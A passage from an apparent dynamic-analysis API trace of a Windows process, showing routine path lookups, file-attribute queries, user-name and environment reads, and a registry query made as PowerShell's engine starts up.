lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0154.027] GetLastError () returned 0xcb [0154.027] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x23e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0154.027] GetLastError () returned 0xcb [0154.027] SetErrorMode (uMode=0x1) returned 0x1 [0154.027] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x23e5c0 | out: lpFileInformation=0x23e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x574268e0, ftLastAccessTime.dwHighDateTime=0x1d466db, ftLastWriteTime.dwLowDateTime=0x574268e0, ftLastWriteTime.dwHighDateTime=0x1d466db, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0154.027] GetLastError () returned 0xcb [0154.027] SetErrorMode (uMode=0x1) returned 0x1 [0154.027] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x23e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0154.027] GetLastError () returned 0xcb [0154.027] SetErrorMode (uMode=0x1) returned 0x1 [0154.027] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x23e5c0 | out: lpFileInformation=0x23e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x574268e0, ftLastAccessTime.dwHighDateTime=0x1d466db, ftLastWriteTime.dwLowDateTime=0x574268e0, ftLastWriteTime.dwHighDateTime=0x1d466db, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0154.027] GetLastError () returned 0xcb [0154.027] SetErrorMode (uMode=0x1) returned 0x1 [0154.027] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x23e154, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0154.027] GetLastError () returned 0xcb [0154.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x23e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0154.027] GetLastError () returned 0xcb [0154.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x23e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.027] GetLastError () returned 0xcb [0154.028] SetErrorMode (uMode=0x1) returned 0x1 [0154.028] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x23e5c0 | out: lpFileInformation=0x23e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0154.028] GetLastError () returned 0xcb [0154.028] SetErrorMode (uMode=0x1) returned 0x1 [0154.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x23e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.028] GetLastError () returned 0xcb [0154.028] SetErrorMode (uMode=0x1) returned 0x1 [0154.028] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x23e5c0 | out: lpFileInformation=0x23e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0154.028] GetLastError () returned 0xcb [0154.028] SetErrorMode (uMode=0x1) returned 0x1 [0154.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x23e154, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.028] GetLastError () returned 0xcb [0154.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x23e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.028] GetLastError () returned 0xcb [0154.028] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x23e14c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0154.028] GetLastError () returned 0xcb [0154.029] SetErrorMode (uMode=0x1) returned 0x1 [0154.029] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x23e5cc | out: lpFileInformation=0x23e5cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x574268e0, ftLastAccessTime.dwHighDateTime=0x1d466db, ftLastWriteTime.dwLowDateTime=0x574268e0, ftLastWriteTime.dwHighDateTime=0x1d466db, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0154.029] GetLastError () returned 0xcb [0154.029] SetErrorMode (uMode=0x1) returned 0x1 [0154.029] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x23e14c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0154.029] GetLastError () returned 0xcb [0154.029] SetErrorMode (uMode=0x1) returned 0x1 [0154.029] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x23e5cc | out: lpFileInformation=0x23e5cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x574268e0, ftLastAccessTime.dwHighDateTime=0x1d466db, ftLastWriteTime.dwLowDateTime=0x574268e0, ftLastWriteTime.dwHighDateTime=0x1d466db, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0154.029] GetLastError () returned 0xcb [0154.029] SetErrorMode (uMode=0x1) returned 0x1 [0154.029] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x23e160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0154.029] GetLastError () returned 0xcb [0154.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x23e0fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0154.029] GetLastError () returned 0xcb [0154.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x23e14c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.029] GetLastError () returned 0xcb [0154.029] SetErrorMode (uMode=0x1) returned 0x1 [0154.030] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x23e5cc | out: lpFileInformation=0x23e5cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0154.030] GetLastError () returned 0xcb [0154.030] SetErrorMode (uMode=0x1) returned 0x1 [0154.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x23e14c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.030] GetLastError () returned 0xcb [0154.030] SetErrorMode (uMode=0x1) returned 0x1 [0154.030] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x23e5cc | out: lpFileInformation=0x23e5cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0154.030] GetLastError () returned 0xcb [0154.030] SetErrorMode (uMode=0x1) returned 0x1 [0154.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x23e160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.030] GetLastError () returned 0xcb [0154.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x23e0fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.030] GetLastError () returned 0xcb [0154.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x23e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.115] GetLastError () returned 0xcb [0154.115] SetErrorMode (uMode=0x1) returned 0x1 [0154.116] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2a1c150 | out: lpFileInformation=0x2a1c150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0154.116] GetLastError () returned 0xcb [0154.116] SetErrorMode (uMode=0x1) returned 0x1 [0154.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e264, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.118] GetLastError () returned 0xcb [0154.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.118] GetLastError () returned 0xcb [0154.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.118] GetLastError () returned 0xcb [0154.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.118] GetLastError () returned 0xcb [0154.164] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x348b88, nSize=0x23e7b8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x23e7b8) returned 0x1 [0154.164] GetLastError () returned 0xcb [0154.165] GetUserNameW (in: lpBuffer=0x357e88, pcbBuffer=0x23e7c0 | out: lpBuffer="aETAdzjz", pcbBuffer=0x23e7c0) returned 1 [0154.166] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a3ce50*="Available", lpRawData=0x2a3cd0c) returned 1 [0154.172] GetLastError () returned 0x0 [0154.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.172] GetLastError () returned 0xcb [0154.173] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.173] GetLastError () returned 0xcb [0154.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e298, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.186] GetLastError () returned 0xcb [0154.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.186] GetLastError () returned 0xcb [0154.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.186] GetLastError () returned 0xcb [0154.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e23c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.202] GetLastError () returned 0xcb [0154.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.202] GetLastError () returned 0xcb [0154.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.202] GetLastError () returned 0xcb [0154.203] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0154.203] GetLastError () returned 0xcb [0154.203] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf [0154.203] GetLastError () returned 0xcb [0154.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e23c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.203] GetLastError () returned 0xcb [0154.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.203] GetLastError () returned 0xcb [0154.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.203] GetLastError () returned 0xcb [0154.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e23c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.203] GetLastError () returned 0xcb [0154.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.203] GetLastError () returned 0xcb [0154.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.203] GetLastError () returned 0xcb [0154.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e23c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.204] GetLastError () returned 0xcb [0154.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.204] GetLastError () returned 0xcb [0154.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.204] GetLastError () returned 0xcb [0154.204] GetCurrentProcessId () returned 0x9c4 [0154.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e23c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.204] GetLastError () returned 0xcb [0154.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.204] GetLastError () returned 0xcb [0154.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.204] GetLastError () returned 0xcb [0154.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e228, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.205] GetLastError () returned 0xcb [0154.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.205] GetLastError () returned 0xcb [0154.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.205] GetLastError () returned 0xcb [0154.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e228, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.205] GetLastError () returned 0xcb [0154.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.205] GetLastError () returned 0xcb [0154.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.205] GetLastError () returned 0xcb [0154.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e23c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.205] GetLastError () returned 0xcb [0154.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.206] GetLastError () returned 0xcb [0154.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.206] GetLastError () returned 0xcb [0154.206] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e74c | out: phkResult=0x23e74c*=0x39c) returned 0x0 [0154.206] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e794, lpData=0x0, lpcbData=0x23e790*=0x0 | out: lpType=0x23e794*=0x1, lpData=0x0, lpcbData=0x23e790*=0x56) returned 0x0 [0154.206] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e794, lpData=0x357e88, lpcbData=0x23e790*=0x56 | out: lpType=0x23e794*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x23e790*=0x56) returned 0x0 [0154.207] RegCloseKey (hKey=0x39c) returned 0x0 [0154.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e23c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.207] GetLastError () returned 0xcb [0154.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.207] GetLastError () returned 0xcb [0154.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.207] GetLastError () returned 0xcb [0154.208] 